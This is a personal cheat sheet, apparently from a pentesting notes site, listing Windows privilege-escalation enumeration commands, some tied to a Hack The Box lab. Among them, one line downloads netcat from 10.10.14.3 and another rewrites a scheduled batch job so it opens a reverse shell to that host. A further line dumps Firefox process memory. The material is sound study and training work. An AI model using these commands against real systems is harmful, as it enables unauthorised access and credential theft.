Windows Privilege Scalation

Basic Enumeration

#Enumerate Privileges

whoami/priv

#File Privilages

icacls {FILENAME}

#Enumerate Scheduled TASKS

schtasks

#Hidden Files

dir -a

#OS information

wmic os list brief

Get-WmiObject -Class Win32_OperatingSystem | select SystemDirectory,BuildNumber,SerialNumber,Version | ft

#User SID

Get-CimInstance -ClassName Win32_UserAccount -Filter "Name='bob.smith'" | Select-Object SID

#Group SID

$group = Get-WmiObject -Query "SELECT * FROM Win32_Group WHERE Name = 'HR'"
$group.SID

Powershell

#Running Process

ps

#Download files

wget [<http://CHANGEIP/nc64.exe>](<http://10.10.14.3/nc64.exe>) -outfile nc64.exe

#Modify File

echo C:\\Log-Management\\nc64.exe -e cmd.exe 10.10.14.3:1234 > C:\\Log-Management\\job.bat

HTB module

#RDP to lab target
xfreerdp /v:<target IP address> /u:htb-student /p:<password>

#Get information about the operating system
Get-WmiObject -Class win32_OperatingSystem

#View all files and directories in the c:\\ root directory
dir c:\\ /a

#Graphically displaying the directory structure of a path
tree <directory>

#Walk through results of the `tree` command page by page
tree c:\\ /f \\| more

#View the permissions set on a directory
icacls <directory> 

#Grant a user full permissions to a directory 
icacls c:\\users /grant joe:f

#Remove a users permissions on a directory
icacls c:\\users /remove joe

#PowerShell` cmdlet to view running services
Get-Service

#Display the help menu for a specific command
help <command>

#List `PowerShell` aliases
get-alias

#Create a new `PowerShell` alias
New-Alias -Name "Show-Files" Get-ChildItem 

#View imported `PowerShell` modules and their associated commands
Get-Module \\| select Name,ExportedCommands \\| fl

#View the `PowerShell` execution policy 
Get-ExecutionPolicy -List

#Set the `PowerShell` execution policy to bypass for the current session
Set-ExecutionPolicy Bypass -Scope Process

#Get information about the operating system with `wmic`
wmic os list brief

#Call methods of `WMI` objects 
Invoke-WmiMethod

#View the current users' SID
whoami /user

#View information about a registry key 
reg query <key>

#Check which `Defender` protection settings are enabled
Get-MpComputerStatus

#Load Server Configuration menu in Windows Server Core
sconfig

Remote Management

evil-winrm -i <IP> -u <USER> -p <PASSWORD>

Process Enumeration

#List Process
ps
get-process
#dump the process memory
./procdump.exe -accepteula -ma 6360 firefox.dmp

Look for streams

dir /R

#You can reead the stream pipping it into more
more < hm.txt:root.txt

Mdbtools

#install
apt install mdbtools
#list programs
mdb- <backup>
#List tables
mdb-tables <databasename>
#dumb
mdb-export <databasename> <tablename>
#Lool to enumerate
mdb-tables backup.mdb | tr ' ' '\\n' | grep . | while read table; do lines=$(mdb-export backup.mdb $table | wc -l); if [ $lines -gt 1 ]; then echo "$table: $lines"; fi; done

Online Access DB Opener

Tools:

PreviousBuffer Overflow - LinuxNextBluetooth

Last updated